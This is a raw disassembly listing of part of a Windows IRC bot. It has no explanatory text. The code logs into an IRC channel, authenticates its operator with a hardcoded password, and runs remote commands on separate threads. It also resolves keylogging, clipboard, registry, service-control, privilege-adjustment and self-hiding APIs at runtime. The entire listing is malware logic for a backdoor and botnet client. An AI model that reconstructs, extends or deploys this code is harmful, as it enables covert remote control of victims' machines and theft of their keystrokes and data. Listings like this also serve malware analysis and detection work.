jz short loc_40C9D2
loc_40C9BC: ; CODE XREF: sub_4087B3+421D�j
cmp [ebp+var_44C], ebx
jnz loc_40CEDA
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40C9BC
; ---------------------------------------------------------------------------
loc_40C9D2: ; CODE XREF: sub_4087B3+4207�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42D9A0
jmp loc_40CECB
; ---------------------------------------------------------------------------
loc_40C9E3: ; CODE XREF: sub_4087B3+107F�j
; sub_4087B3+1094�j
cmp [ebp+var_8], ebx
jnz short loc_40CA02
push ebx
push [ebp+var_4]
push offset dword_42D974
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
loc_40CA02: ; CODE XREF: sub_4087B3+4233�j
push [ebp+arg_4]
call dword_4916F4 ; closesocket
call dword_4915BC ; WSACleanup
call sub_401122
push ebx
call ds:dword_495350 ; ExitProcess
loc_40CA1D: ; CODE XREF: sub_4087B3+1055�j
; sub_4087B3+106A�j
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_40125D
pop ecx
pop ecx
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
push offset dword_42D94C
jmp short loc_40CA75
; ---------------------------------------------------------------------------
loc_40CA48: ; CODE XREF: sub_4087B3+102B�j
; sub_4087B3+1040�j
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_401302
add esp, 0Ch
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
push offset dword_42D920
loc_40CA75: ; CODE XREF: sub_4087B3+405A�j
; sub_4087B3+4293�j
call sub_401014
loc_40CA7A: ; CODE XREF: sub_4087B3+3065�j
add esp, 18h
jmp loc_40D023
; ---------------------------------------------------------------------------
loc_40CA82: ; CODE XREF: sub_4087B3+1001�j
; sub_4087B3+1016�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010AF
jmp loc_408B74
; ---------------------------------------------------------------------------
loc_40CA9B: ; CODE XREF: sub_4087B3+FD7�j
; sub_4087B3+FEC�j
cmp [ebp+var_C], ebx
mov [ebp+var_374], bl
jz short loc_40CADA
mov esi, [ebp+esi+var_9C]
cmp esi, ebx
jz short loc_40CADA
push esi
push [ebp+var_C]
call sub_417760
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40CADA
push eax
push offset aS_2 ; "%s"
lea eax, [ebp+var_374]
push 80h
push eax
call sub_4163D7
add esp, 10h
loc_40CADA: ; CODE XREF: sub_4087B3+42F1�j
; sub_4087B3+42FC�j ...
push [ebp+var_98]
lea eax, [ebp+var_3F4]
push 80h
push eax
call sub_4163D7
mov eax, [ebp+arg_4]
push offset dword_42D8F8
mov [ebp+var_3F8], eax
mov eax, [ebp+var_4]
mov [ebp+var_2F0], eax
mov eax, [ebp+var_8]
mov [ebp+var_2EC], eax
lea eax, [ebp+var_2E4]
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 1Ch
push eax
call sub_40105F
add esp, 20h
mov [ebp+var_2F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3F8]
push ebx
push eax
push offset loc_40114A
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_2F4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40CB7A
loc_40CB64: ; CODE XREF: sub_4087B3+43C5�j
cmp [ebp+var_2E8], ebx
jnz loc_408B77
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40CB64
; ---------------------------------------------------------------------------
loc_40CB7A: ; CODE XREF: sub_4087B3+43AF�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42D8A8
jmp loc_408D60
; ---------------------------------------------------------------------------
loc_40CB8B: ; CODE XREF: sub_4087B3+FAD�j
; sub_4087B3+FC2�j
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_401028
push offset dword_42D880
call sub_401014
loc_40CBA6: ; CODE XREF: sub_4087B3+3FCA�j
add esp, 10h
jmp loc_40D023
; ---------------------------------------------------------------------------
loc_40CBAE: ; CODE XREF: sub_4087B3+F83�j
; sub_4087B3+F98�j
push [ebp+var_98]
lea eax, [ebp+var_4DC]
push 80h
push eax
call sub_4163D7
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_9C]
mov [ebp+var_4E0], eax
mov eax, [ebp+var_4]
mov [ebp+var_454], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_450], eax
jz short loc_40CC08
push offset dword_42D87C
push esi
call sub_416B70
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_458], eax
jmp short loc_40CC0E
; ---------------------------------------------------------------------------
loc_40CC08: ; CODE XREF: sub_4087B3+4439�j
mov [ebp+var_458], ebx
loc_40CC0E: ; CODE XREF: sub_4087B3+4453�j
lea eax, [ebp+var_2E4]
push offset dword_42D84C
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push 1Fh
push eax
call sub_40105F
add esp, 14h
mov [ebp+var_45C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4E0]
push ebx
push eax
push offset sub_4011E5
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_45C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40CC78
loc_40CC66: ; CODE XREF: sub_4087B3+44C3�j
cmp [ebp+var_44C], ebx
jnz short loc_40CC93
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40CC66
; ---------------------------------------------------------------------------
loc_40CC78: ; CODE XREF: sub_4087B3+44B1�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42D7FC
loc_40CC84: ; CODE XREF: sub_4087B3+35A0�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 0Ch
loc_40CC93: ; CODE XREF: sub_4087B3+1F0C�j
; sub_4087B3+1F2E�j ...
lea eax, [ebp+var_2E4]
push eax
loc_40CC9A: ; CODE XREF: sub_4087B3+11C4�j
call sub_401014
pop ecx
jmp loc_40D023
; ---------------------------------------------------------------------------
loc_40CCA5: ; CODE XREF: sub_4087B3+F07�j
; sub_4087B3+F1C�j
push offset dword_42C954
lea eax, [ebp+var_2E4]
push offset dword_42D7D4
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 20h
jmp loc_40B5AF
; ---------------------------------------------------------------------------
loc_40CCDC: ; CODE XREF: sub_4087B3+EDD�j
; sub_4087B3+EF2�j
push dword_4834B0
call sub_4011AE
push eax
lea eax, [ebp+var_2E4]
push offset unk_42D794
push eax
call sub_416821
push ebx
lea eax, [ebp+var_2E4]
push [ebp+var_4]
push eax
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 24h
jmp loc_40B5AF
; ---------------------------------------------------------------------------
loc_40CD1A: ; CODE XREF: sub_4087B3+EB3�j
; sub_4087B3+EC8�j
mov esi, [ebp+esi+var_9C]
cmp esi, ebx
jz short loc_40CD4C
cmp [ebp+var_C], ebx
jz short loc_40CD5B
push esi
push [ebp+var_C]
call sub_417760
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40CD5B
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_401032
add esp, 0Ch
jmp short loc_40CD5B
; ---------------------------------------------------------------------------
loc_40CD4C: ; CODE XREF: sub_4087B3+4570�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_401032
pop ecx
pop ecx
loc_40CD5B: ; CODE XREF: sub_4087B3+4575�j
; sub_4087B3+4584�j ...
push 0FFFFFFFEh
jmp loc_408B79
; ---------------------------------------------------------------------------
loc_40CD62: ; CODE XREF: sub_4087B3+E89�j
; sub_4087B3+E9E�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_401032
push offset dword_42D73C
call sub_401014
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_408B7A
; ---------------------------------------------------------------------------
loc_40CD84: ; CODE XREF: sub_4087B3+E5F�j
; sub_4087B3+E74�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_401032
push offset dword_42D6F4
call sub_401014
add esp, 0Ch
xor eax, eax
jmp loc_408B7A
; ---------------------------------------------------------------------------
loc_40CDA5: ; CODE XREF: sub_4087B3+E35�j
; sub_4087B3+E4A�j
push [ebp+var_4]
push [ebp+var_98]
push [ebp+arg_4]
call sub_4011CC
loc_40CDB6: ; CODE XREF: sub_4087B3+2FCC�j
add esp, 0Ch
jmp loc_40D023
; ---------------------------------------------------------------------------
loc_40CDBE: ; CODE XREF: sub_4087B3+DB9�j
; sub_4087B3+DCE�j
push [ebp+esi+var_9C]
push 1Eh
push offset aProcessList ; "Process list"
push offset dword_42D6C8
jmp loc_4094A3
; ---------------------------------------------------------------------------
loc_40CDD6: ; CODE XREF: sub_4087B3+C87�j
; sub_4087B3+C9C�j ...
push edi
push offset aSecure ; "secure"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_40CDFE
push edi
push offset aSec ; "sec"
call sub_416B70
pop ecx
mov [ebp+var_458], ebx
test eax, eax
pop ecx
jnz short loc_40CE08
loc_40CDFE: ; CODE XREF: sub_4087B3+4632�j
mov [ebp+var_458], 1
loc_40CE08: ; CODE XREF: sub_4087B3+4649�j
push [ebp+var_98]
lea eax, [ebp+var_4DC]
push 80h
push eax
call sub_4163D7
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_458], ebx
mov [ebp+var_4E0], eax
mov eax, [ebp+var_4]
mov [ebp+var_454], eax
mov eax, [ebp+var_8]
mov [ebp+var_450], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_40CE4F
mov eax, offset aUnsecuring ; "Unsecuring"
loc_40CE4F: ; CODE XREF: sub_4087B3+4695�j
push eax
push offset dword_42D680
lea eax, [ebp+var_2E4]
push 200h
push eax
call sub_4163D7
push ebx
lea eax, [ebp+var_2E4]
push 19h
push eax
call sub_40105F
add esp, 1Ch
mov [ebp+var_45C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4E0]
push ebx
push eax
push offset sub_401127
push ebx
push ebx
call ds:dword_49532C ; CreateThread
mov ecx, [ebp+var_45C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E934[ecx], eax
jz short loc_40CEBF
loc_40CEAD: ; CODE XREF: sub_4087B3+470A�j
cmp [ebp+var_44C], ebx
jnz short loc_40CEDA
push 32h
call ds:dword_495324 ; Sleep
jmp short loc_40CEAD
; ---------------------------------------------------------------------------
loc_40CEBF: ; CODE XREF: sub_4087B3+46F8�j
call ds:dword_495328 ; RtlGetLastWin32Error
push eax
push offset unk_42D2AC
loc_40CECB: ; CODE XREF: sub_4087B3+422B�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 0Ch
loc_40CEDA: ; CODE XREF: sub_4087B3+1F7D�j
; sub_4087B3+2A33�j ...
lea eax, [ebp+var_2E4]
push eax
call sub_401014
jmp loc_408D66
; ---------------------------------------------------------------------------
loc_40CEEB: ; CODE XREF: sub_4087B3+C5D�j
; sub_4087B3+C72�j
push offset aXPsy ; "X Psy"
push offset dword_42D664
loc_40CEF5: ; CODE XREF: sub_4087B3+3481�j
; sub_4087B3+3660�j ...
lea eax, [ebp+var_2E4]
push eax
call sub_416821
loc_40CF01: ; CODE XREF: sub_4087B3+4012�j
add esp, 0Ch
jmp loc_40A0FB
; ---------------------------------------------------------------------------
loc_40CF09: ; CODE XREF: sub_4087B3+C33�j
; sub_4087B3+C48�j
mov esi, [ebp+esi+var_9C]
cmp esi, ebx
jz short loc_40CF63
push esi
call sub_416CCF
cmp eax, ebx
pop ecx
jl short loc_40CF5B
cmp eax, 5
jge short loc_40CF5B
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_40CF53
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2E4]
push offset unk_42F93C
push eax
call sub_416821
add esp, 0Ch
mov [esi], bl
jmp loc_40B330
; ---------------------------------------------------------------------------
loc_40CF53: ; CODE XREF: sub_4087B3+477F�j
push eax
push offset unk_42D624
jmp short loc_40CFA0
; ---------------------------------------------------------------------------
loc_40CF5B: ; CODE XREF: sub_4087B3+476A�j
; sub_4087B3+476F�j
push eax
push offset unk_42D5E4
jmp short loc_40CFA0
; ---------------------------------------------------------------------------
loc_40CF63: ; CODE XREF: sub_4087B3+475F�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40CF68: ; CODE XREF: sub_4087B3+47D1�j
push [ebp+var_A0]
push edi
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_40CF8B
inc esi
add edi, 80h
cmp esi, 5
jl short loc_40CF68
jmp loc_40B330
; ---------------------------------------------------------------------------
loc_40CF8B: ; CODE XREF: sub_4087B3+47C5�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_C4]
push eax
push offset unk_42F93C
loc_40CFA0: ; CODE XREF: sub_4087B3+1661�j
; sub_4087B3+1691�j ...
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 0Ch
jmp loc_40B330
; ---------------------------------------------------------------------------
loc_40CFB4: ; CODE XREF: sub_4087B3+C09�j
; sub_4087B3+C1E�j
push [ebp+var_9C]
push offset a332 ; "332"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_40D023
call sub_401109
push ebx
call ds:dword_495350 ; ExitProcess
loc_40CFD6: ; CODE XREF: sub_4087B3+BDF�j
; sub_4087B3+BF4�j
push [ebp+esi+var_9C]
xor eax, eax
cmp [ebp+var_9A4], bl
setnz al
push eax
lea eax, [ebp+var_564]
push dword_42C92C
push eax
call sub_401343
lea eax, [ebp+var_564]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_401032
lea eax, [ebp+var_564]
push eax
push offset unk_42D5B0
call sub_4012B2
add esp, 24h
loc_40D023: ; CODE XREF: sub_4087B3+65C�j
; sub_4087B3+668�j ...
mov eax, [ebp+arg_24]
jmp loc_408B7A
; ---------------------------------------------------------------------------
loc_40D02B: ; CODE XREF: sub_4087B3+6EB�j
; sub_4087B3+700�j
mov esi, [ebp+esi+var_9C]
cmp esi, ebx
mov [ebp+arg_10], esi
jz loc_408B77
cmp [ebp+var_AC], ebx
jnz loc_408B77
push offset asc_42F9BC ; "!"
push [ebp+var_A0]
call sub_4176C0
mov esi, eax
push offset dword_4370B8
push ebx
inc esi
call sub_4176C0
push offset asc_42D5AC ; "~"
push eax
call sub_4176C0
push [ebp+arg_10]
mov edi, eax
push offset aAscl33t ; "ascl33t"
call sub_416B70
add esp, 20h
test eax, eax
jz short loc_40D0D3
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSFailed_ ; "NOTICE %s :Failed. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_401032
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSFaile_0 ; "NOTICE %s :Failed.\r\n"
push [ebp+arg_4]
call sub_401032
push edi
push esi
push offset unk_42D52C
loc_40D0BF: ; CODE XREF: sub_4087B3+497C�j
lea eax, [ebp+var_2E4]
push eax
call sub_416821
add esp, 30h
jmp loc_40B351
; ---------------------------------------------------------------------------
loc_40D0D3: ; CODE XREF: sub_4087B3+48D3�j
mov [ebp+arg_24], offset off_42C9E4
loc_40D0DA: ; CODE XREF: sub_4087B3+4943�j
mov eax, [ebp+arg_24]
push edi
push dword ptr [eax]
call sub_401113
pop ecx
test eax, eax
pop ecx
jnz short loc_40D131
add [ebp+arg_24], 4
cmp [ebp+arg_24], offset off_42C9E8
jl short loc_40D0DA
lea eax, [ebp+var_C4]
push edi
push eax
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSFailed_ ; "NOTICE %s :Failed. (%s!%s).\r\n"
push [ebp+arg_4]
call sub_401032
lea eax, [ebp+var_C4]
push eax
push offset aNoticeSFaile_0 ; "NOTICE %s :Failed.\r\n"
push [ebp+arg_4]
call sub_401032
push edi
push esi
push offset unk_42D4EC
jmp short loc_40D0BF
; ---------------------------------------------------------------------------
loc_40D131: ; CODE XREF: sub_4087B3+4936�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40D136: ; CODE XREF: sub_4087B3+49AD�j
cmp [ebp+arg_10], ebx
jz loc_408B77
cmp [edi], bl
jnz short loc_40D156
push [ebp+arg_10]
push offset aAscl33t ; "ascl33t"
call sub_416B70
pop ecx
test eax, eax
pop ecx
jz short loc_40D167
loc_40D156: ; CODE XREF: sub_4087B3+498E�j
inc esi
add edi, 80h
cmp esi, 5
jl short loc_40D136
jmp loc_408B77
; ---------------------------------------------------------------------------
loc_40D167: ; CODE XREF: sub_4087B3+49A1�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_A94]
push 7Fh
push eax
push esi
call sub_416A10
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40D19E
push ebx
push [ebp+var_4]
push offset unk_42D4BC
push [ebp+var_98]
push [ebp+arg_4]
call sub_4010D2
add esp, 14h
loc_40D19E: ; CODE XREF: sub_4087B3+49CF�j
lea eax, [ebp+var_C4]
push eax
push offset unk_42D488
jmp loc_408D60
; ---------------------------------------------------------------------------
loc_40D1AF: ; CODE XREF: sub_4087B3+20E�j
; sub_4087B3+223�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_401032
push offset aXRi ; "-x+Ri"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_401032
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_401032
add esp, 2Ch
mov dword_483630, edi
jmp loc_408A50
sub_4087B3 endp
; ---------------------------------------------------------------------------
db 1290h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E485 proc near ; CODE XREF: sub_401032�j
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push 200h
push eax
call sub_416BF4
add esp, 10h
lea eax, [ebp+var_200]
push 0
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_4916AC ; send
leave
retn
sub_40E485 endp
; ---------------------------------------------------------------------------
db 11h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E4DC proc near ; CODE XREF: sub_4010D2�j
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice ; "NOTICE"
jnz short loc_40E4F7
mov edi, offset aPrivmsg ; "PRIVMSG"
loc_40E4F7: ; CODE XREF: sub_40E4DC+14�j
push edi
call sub_4158E0
push [ebp+arg_4]
mov esi, 1FAh
sub esi, eax
call sub_4158E0
push [ebp+arg_8]
sub esi, eax
lea eax, [ebp+var_400]
push offset aS_2 ; "%s"
push esi
push eax
call sub_4163D7
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push [ebp+arg_4]
push edi
push offset aSSS_1 ; "%s %s :%s\r\n"
push eax
call sub_416821
add esp, 2Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_4158E0
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_4916AC ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_40E575
push 7D0h
call ds:dword_495324 ; Sleep
locret_40E575: ; CODE XREF: sub_40E4DC+8C�j
leave
retn
sub_40E4DC endp
; ---------------------------------------------------------------------------
db 26h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40E59D proc near ; CODE XREF: sub_4012F3�j
push ebx
push ebp
mov ebp, ds:dword_4953A8
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_4953C4
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_40E6BD
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_491708, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_49167C, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_491660, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_49157C, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_491528, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_491558, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_4915CC, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_4916BC, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_491718, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_491588, eax
call esi ; GetProcAddress
cmp dword_491708, ebx
mov dword_491570, eax
jz short loc_40E69B
cmp dword_49167C, ebx
jz short loc_40E69B
cmp dword_491660, ebx
jz short loc_40E69B
cmp dword_49157C, ebx
jz short loc_40E69B
cmp dword_491558, ebx
jz short loc_40E69B
cmp dword_4915CC, ebx
jz short loc_40E69B
cmp dword_4916BC, ebx
jz short loc_40E69B
cmp dword_491718, ebx
jz short loc_40E69B
cmp dword_491588, ebx
jz short loc_40E69B
cmp eax, ebx
jnz short loc_40E6A5
loc_40E69B: ; CODE XREF: sub_40E59D+B8�j
; sub_40E59D+C0�j ...
mov dword_49171C, 1
loc_40E6A5: ; CODE XREF: sub_40E59D+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_491694, eax
jz short loc_40E6D2
push 1
push ebx
call eax ; DnsFlushResolverCache
jmp short loc_40E6D2
; ---------------------------------------------------------------------------
loc_40E6BD: ; CODE XREF: sub_40E59D+1D�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491720, eax
mov dword_49171C, 1
loc_40E6D2: ; CODE XREF: sub_40E59D+117�j
; sub_40E59D+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_4953C0 ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40E7E7
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4916B8, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_491668, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_4915FC, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_49170C, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_49162C, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_49164C, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_4916B0, eax
call esi ; GetProcAddress
cmp dword_4916B8, ebx
mov dword_4915A4, eax
jz short loc_40E78B
cmp dword_491668, ebx
jz short loc_40E78B
cmp dword_4915FC, ebx
jz short loc_40E78B
cmp dword_49170C, ebx
jz short loc_40E78B
cmp dword_49162C, ebx
jz short loc_40E78B
cmp dword_49164C, ebx
jz short loc_40E78B
cmp dword_4916B0, ebx
jz short loc_40E78B
cmp eax, ebx
jnz short loc_40E795
loc_40E78B: ; CODE XREF: sub_40E59D+1B8�j
; sub_40E59D+1C0�j ...
mov dword_491724, 1
loc_40E795: ; CODE XREF: sub_40E59D+1EC�j
push offset aGetasynckeysta ; "GetAsyncKeyState"
push edi
call esi ; GetProcAddress
push offset aGetkeystate ; "GetKeyState"
push edi
mov dword_491628, eax
call esi ; GetProcAddress
push offset aGetwindowtexta ; "GetWindowTextA"
push edi
mov dword_49153C, eax
call esi ; GetProcAddress
push offset aGetforegroundw ; "GetForegroundWindow"
push edi
mov dword_4915F8, eax
call esi ; GetProcAddress
cmp dword_491628, ebx
mov dword_4915E4, eax
jz short loc_40E7F2
cmp dword_49153C, ebx
jz short loc_40E7F2
cmp dword_4915F8, ebx
jz short loc_40E7F2
cmp eax, ebx
jnz short loc_40E7FC
jmp short loc_40E7F2
; ---------------------------------------------------------------------------
loc_40E7E7: ; CODE XREF: sub_40E59D+144�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491728, eax
loc_40E7F2: ; CODE XREF: sub_40E59D+232�j
; sub_40E59D+23A�j ...
mov dword_491724, 1
loc_40E7FC: ; CODE XREF: sub_40E59D+246�j
push offset aAdvapi32_dll ; "advapi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40E997
push offset aRegopenkeyexa ; "RegOpenKeyExA"
push edi
call esi ; GetProcAddress
push offset aRegcreatekeyex ; "RegCreateKeyExA"
push edi
mov dword_4916CC, eax
call esi ; GetProcAddress
push offset aRegsetvalueexa ; "RegSetValueExA"
push edi
mov dword_491610, eax
call esi ; GetProcAddress
push offset aRegqueryvaluee ; "RegQueryValueExA"
push edi
mov dword_491680, eax
call esi ; GetProcAddress
push offset aRegdeletevalue ; "RegDeleteValueA"
push edi
mov dword_491568, eax
call esi ; GetProcAddress
push offset aRegclosekey ; "RegCloseKey"
push edi
mov dword_4915C8, eax
call esi ; GetProcAddress
cmp dword_4916CC, ebx
mov dword_491638, eax
jz short loc_40E887
cmp dword_491610, ebx
jz short loc_40E887
cmp dword_491680, ebx
jz short loc_40E887
cmp dword_491568, ebx
jz short loc_40E887
cmp dword_4915C8, ebx
jz short loc_40E887
cmp eax, ebx
jnz short loc_40E891
loc_40E887: ; CODE XREF: sub_40E59D+2C4�j
; sub_40E59D+2CC�j ...
mov dword_49172C, 1
loc_40E891: ; CODE XREF: sub_40E59D+2E8�j
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov dword_491640, eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov dword_491618, eax
call esi ; GetProcAddress
cmp dword_491640, ebx
mov dword_4916C8, eax
jz short loc_40E8CC
cmp dword_491618, ebx
jz short loc_40E8CC
cmp eax, ebx
jnz short loc_40E8D6
loc_40E8CC: ; CODE XREF: sub_40E59D+321�j
; sub_40E59D+329�j
mov dword_49172C, 1
loc_40E8D6: ; CODE XREF: sub_40E59D+32D�j
push offset aOpenscmanagera ; "OpenSCManagerA"
push edi
call esi ; GetProcAddress
push offset aOpenservicea ; "OpenServiceA"
push edi
mov dword_491650, eax
call esi ; GetProcAddress
push offset aStartservicea ; "StartServiceA"
push edi
mov dword_491544, eax
call esi ; GetProcAddress
push offset aControlservice ; "ControlService"
push edi
mov dword_49154C, eax
call esi ; GetProcAddress
push offset aDeleteservice ; "DeleteService"
push edi
mov dword_4915AC, eax
call esi ; GetProcAddress
push offset aCloseserviceha ; "CloseServiceHandle"
push edi
mov dword_4915B0, eax
call esi ; GetProcAddress
push offset aEnumservicesst ; "EnumServicesStatusA"
push edi
mov dword_491560, eax
call esi ; GetProcAddress
push offset aIsvalidsecurit ; "IsValidSecurityDescriptor"
push edi
mov dword_49161C, eax
call esi ; GetProcAddress
cmp dword_491650, ebx
mov dword_491550, eax
jz short loc_40E97A
cmp dword_491544, ebx
jz short loc_40E97A
cmp dword_49154C, ebx
jz short loc_40E97A
cmp dword_4915AC, ebx
jz short loc_40E97A
cmp dword_4915B0, ebx
jz short loc_40E97A
cmp dword_491560, ebx
jz short loc_40E97A
cmp dword_49161C, ebx
jz short loc_40E97A
cmp eax, ebx
jnz short loc_40E984
loc_40E97A: ; CODE XREF: sub_40E59D+3A7�j
; sub_40E59D+3AF�j ...
mov dword_49172C, 1
loc_40E984: ; CODE XREF: sub_40E59D+3DB�j
push offset aGetusernamea ; "GetUserNameA"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_491548, eax
jnz short loc_40E9AC
jmp short loc_40E9A2
; ---------------------------------------------------------------------------
loc_40E997: ; CODE XREF: sub_40E59D+26A�j
call ds:dword_495328 ; RtlGetLastWin32Error
mov dword_491730, eax
loc_40E9A2: ; CODE XREF: sub_40E59D+3F8�j
mov dword_49172C, 1
loc_40E9AC: ; CODE XREF: sub_40E59D+3F6�j
push offset aGdi32_dll ; "gdi32.dll"
call ebp ; GetModuleHandleA
mov edi, eax
cmp edi, ebx
jz loc_40EA78
push offset aCreatedca ; "CreateDCA"
push edi
call esi ; GetProcAddress
push offset aCreatedibsecti ; "CreateDIBSection"
push edi
mov dword_491648, eax
call esi ; GetProcAddress
